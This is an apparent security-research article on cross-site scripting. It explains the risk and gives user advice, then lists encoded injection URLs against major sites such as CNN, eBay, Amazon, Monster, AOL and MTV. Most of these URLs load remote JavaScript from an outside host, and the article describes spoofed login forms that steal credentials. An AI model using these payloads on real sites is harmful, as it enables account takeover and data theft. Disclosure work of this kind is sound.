You can use the form below to search our site. Just enter the
keywords to search.
|
|
 |
|
When Small Mistakes Can Cause Big Problems
|
September 18, 2021
|
What do popular websites such as Amazon, eBay, half.com, CareerBuilder, AOL,
CNN, MTV, VH1, HBO and many others have in common? Well, aside from being
amongst the most popular places on the internet they also share a common flaw;
Cross Site Scripting.
What Is "Cross Site Scripting"?
Cross Site Scripting occurs mostly from a lack of input validation within a
vulnerable web application. This can allow for an attacker to send a victim
a malicious link which will then render possible malicious code in the context
of the victim’s browser. In another words Person A can tell Person B "Hey, have
a look at this cool website!" Person B has probably heard all about recent virii
and the like, and knows not to open attachments from unknown sources, keep an
up to date antivirus program, and make sure their operating system has all of
the required security patches. Person B probably does not think much about
visiting this website; except when he does Person A's malicious code is executed.
This is definitely not a good scenario, and has been officially recognized since
February 2002 by such various agencies as the CERT Coordination Center, DoD-CERT,
DoD Joint Task Force for Computer Network Defense, the Federal Computer Incident
Response Capability, and the National Infrastructure Protection Center as a very
real attack vector.
The Risks Of Cross Site Scripting
Let’s assume that in the example given earlier between Person A and Person B,
that the website used to render the malicious code was some less trusted website
such as a blog, or personal site. This probably poses a smaller risk because not
only would any smart user’s suspicions be higher, but also any data that could be
stolen is probably insignificant compared to financial data, and sensitive personal
information. Now what if the same scenario presented itself on some major eCommerce
website such as Amazon or eBay? The stakes are much higher for a few reasons. One,
being that the data stored on the website is much more sensitive (financial and
personal information) and greatly desired by an attacker, and the other being that
the site is much more trusted because of its size and reputation. The problem with
the second scenario is that it is not theoretical, but real.
The Problem Is Real!
GulfTech Security Research was able to find in the past few weeks, cross site
scripting issues that existed on eBay, Amazon, Half.com, HBO, CareerBuilder,
AOL, CNN, MTV, and many others. The cross site scripting issues on these websites
could allow an attacker to take control of arbitrary accounts, or steal sensitive
info. Websites such as eBay, Amazon, and Half.com (for example) have fairly good
Security when it comes to protecting their user’s accounts, but even they are
vulnerable to data theft via these vulnerabilities. For example, it may be somewhat
useless to steal a victim’s cookie, or try and render malicious code, or force
command execution on a website with tight account security. So instead of relying
on some great technological advantage an attacker could simply attempt to take
advantage of the human element and have the victim simply give the attacker their
account information. This can be done by using the cross site scripting
vulnerabilities to temporarily deface a website. So, instead of rendering malicious
code, or trying to steal a user’s cookie, the attacker can link to an offsite
JavaScript, and have it render a login form using the vulnerable website’s own HTML
and Style Sheet so that it looks nearly identical to the legitimate login form. Of
course when a victim logs in to this form it actually just steals their login
credentials. The attacker could also use the same methods of temporarily defacing
the website to show someone a fictitious news story on a major news website.
How To Protect Yourself
The only foolproof way to protect yourself from these kinds of attacks is to turn off
script support in your browser. This however greatly reduces the functionality of your
browser in most cases. Other measures you can take to protect yourself are to examine
links before you follow them. If you see something funny in the URL such an unusual
amount of hex characters, markup language, or script, then you probably do not want
to follow the link. It is also best to not check the “remember my password� option
that a lot of sites make available. These steps will help you keep safe, but the
majority of this problem comes from unsafe programming practices, and should be
eliminated by the developers before being made publicly available.
See The Problems In Action
Before showing any real world examples, it is VERY important to know that GulfTech
Research and Development does not condone the use of these flaws for malicious purposes.
In fact, we heavily discourage it. These examples are here for information purposes only,
and to give both consumers and web developers a look at what not to do and what kind of
links NOT to follow. I have made attempts to contact the affected websites before writing
this article. Only a few responded, and even some of those did not get it right. CNN for
example were one of the few that responded, and seemed to have fixed the problem shortly
after. The problem was though, that if I entered any script in an unorthodox manner, such
as spelling (sCrIPt) or tied script attributes to another tag, then the code would be
executed. Now, it seems that no type of protection is there. This could allow for a
malicious user to attack accounts within the cnn.com domain, spoof a login form that sends
the attacker the victim's login credentials, or put up their own bogus news story and make
it look flawlessly legit by viewing the outputted source code and injecting their defacement
in such a manner that the flow of the code is not interrupted at all. In this example we
see the GTRAD name in big letters, but we also see broken tags which make it look sloppy
and suspicious, but as I said before this can be avoided.
http://search.cnn.com/pages/search/advanced.jsp?Coll=cnn_xml&QuerySubmit;=true&Page;=1&Query;
Text=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
CNN is not the only large and trusted new website affected though. Another example is ABC
news. The vulnerability present in ABC news is sort of an example of what I will be talking
about next.
http://infospace.abcnews.com/_1_2B4MUKW03Y7ZYZZ__info.abcnws/dog/results?otmpl=dog/
webresults.htm&qcat;=web&ran;=&qkw;=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/
foobar.js%22%3E%3C/script%3E%3C!--%3C!--
Another scenario is large domains putting their trust in someone else's code. Take for
example the issue in LiveWorld products GulfTech released a few weeks ago. The
vulnerabilities affected the likes of HBO, eBay, and others. The affected domains did not
host the vulnerable software, LiveWorld did. The problem is that the DNS for the parent
domains were still used:
http://answercenter.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.
gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
http://groups.ebay.com/findclub!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2F
stuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
http://forums.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.
gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E
http://boards.hbo.com/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2F
stuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
What does this mean? Well, it can affect both the human element, and the technical element.
On one hand a user could possible steal information associated with the parent domains such
as cookie information etc., and in cases where that was not a preferred avenue of attacking
a victim a malicious user may temporarily deface a webpage with a spoofed login form.
Because the user trusts the domain, it makes the second example more easily executed.
LiveWorld fixed these issues after I made them public, but never did respond when I informed
them of the issues in advance of the public release.
So, what could be worse than what we have already talked about? How about an attacker gaining
access to sensitive personal and financial data? Well, this is a possibility, and you will
soon see how. Let's think about some websites that are becoming household names when it comes
to commerce, and employment. Employment websites for example usually require a good deal of
personal information. Monster, and CareerBuilder are probably two of the most popular websites
available for both job seekers, and employers. Unfortunately they are also vulnerable to the
same cross site scripting issues as I talked about before.
http://my.monster.com/viewresume.asp?nextpage=home.asp%22%3E%3Cscript%20src=%22http://
stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&resumeid;=RESUMEIDHERE&original;=current
http://www.careerbuilder.com/share/Login.asp?sc_cmp2=JS_HP1_Nav_MyCB%22%20//--%3E%3C/
script%3E%3C/script%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/
script%3E%3Cscript%3E%3C!--%20var%20blah=%22
Seeing as how identity theft is on the rise, vulnerabilities on major employment websites
such as these could be potentially devastating if successfully exploited. Now let’s talk
about eCommerce. Earlier I pointed out ways eBay users could be attacked, so I will not
talk about eBay again here even though it definitely falls into this category, but I will
talk about eBay's half.com as well as Amazon and others. These are the same types of attacks,
and can potentially lead to the same consequences.
http://half.ebay.com/search/search.jsp?nthTime=&product;=all&keyword;=%22%3E%3Cscript%20src=
%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&x;=0&y;=0
http://www.amazon.com/exec/obidos/tg/detail/-/0802132952/%22%3E%3E%3Cscript%20src=http://
stuff.gulftech.org/foobar.js%3E%3C/script%3E/ref=pd_sim_books_3/104-8941545-9279926/103-
1795435-7689412?v=glance&s;=books
Both Half.com and Amazon do a fairly good job of protecting user's accounts. Stealing cookies
may be trivial, but spoofed login forms and even performing some forced command execution is
definitely possible. Sure, these are all interesting, and for some of us equally as worrisome,
but it seems a bit humorous when large technical entities leave themselves opened up to these
same kind of attacks. Who would allow this you ask? Well, AOL, Veritas, Intel, and many others.
http://www.aol.com/support/index.adp?toc=%22%22%20//--%3E%3C/script%3E%3C/script%3E%3Cscript
%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3Cscript%3E%3C!--%20var%20b
lah=%22
http://search.intel.com/support/search.asp?q1=%22%3E%3Ch1%3EGulfTech%20Research%20And%20
Development%3C/h1%3E%3C!--%3C!--%3C!--%3C!--%3C!--
http://forums.veritas.com/discussions/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22
http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--
I hope that as a user you have a better idea of what to look out for, and know that these
types of attacks are very real and can be exploited, and that a very large number of your
favorite sites could be vulnerable to these attacks.
http://searchb.disney.go.com/disneySearch?col1=disney%20store%20parks%20video&qt;=
%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
http://faq.orbitz.com/cgi-bin/orbitz.cfg/php/enduser/std_search_custom.php?p_new_search=
1&p;_search_text=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22
%3E%3C%2Fscript%3E%3C%21--%3C%21--
http://www.mtv.com/community/profiles/profile_not_found.jhtml?username=%22%3E%3Cscript
%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
http://www.vh1.com/search/search_shows.jhtml?sorttype=by_name_asc&searchtype;=show&
searchterm=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
The best way to learn to be safe is to know the risks, and become familiar with potential
attack types. I hope this article has helped with this.
Disclaimer
GulfTech Security Research has discovered all of these XSS issues independently. We are in no
way affilated with any of the named companies. We greatly discourage the use of these examples
for malicious porposes, and can not be held responsible for any certain individuals actions. If
you would like to use any of these examples on your website, feel free to as long as you give us
credit and do not use them for malicious purposes.
References
Possible Security Issues In LiveWorld Products
http://www.gulftech.org/?node=research&article;_id=00044-08232004
CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html
The Cross Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml
Preventing Cross-site Scripting Attacks
http://www.perl.com/pub/a/2002/02/20/css.html
|
|
|
|
